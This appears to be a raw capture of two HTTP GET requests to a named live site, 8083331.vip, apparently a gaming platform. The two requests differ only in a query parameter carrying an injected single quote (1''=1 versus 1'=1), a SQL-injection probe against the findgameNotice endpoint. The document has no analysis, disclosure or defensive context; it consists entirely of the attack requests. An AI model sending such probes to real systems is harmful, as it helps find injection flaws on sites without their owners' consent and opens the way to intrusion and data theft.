GET /member/gameNotice/findgameNotice?deviceType=1&1''=1 HTTP/1.1
Host: 8083331.vip
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Authorization: undefined
Referer: https://8083331.vip/
deviceInfo: {"mobile":"Chrome 113.0.5672.127","os":"Windows 113.0.5672.127","browser":"Chrome"}
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0



GET /member/gameNotice/findgameNotice?deviceType=1&1'=1 HTTP/1.1
Host: 8083331.vip
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Authorization: undefined
Referer: https://8083331.vip/
deviceInfo: {"mobile":"Chrome 113.0.5672.127","os":"Windows 113.0.5672.127","browser":"Chrome"}
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

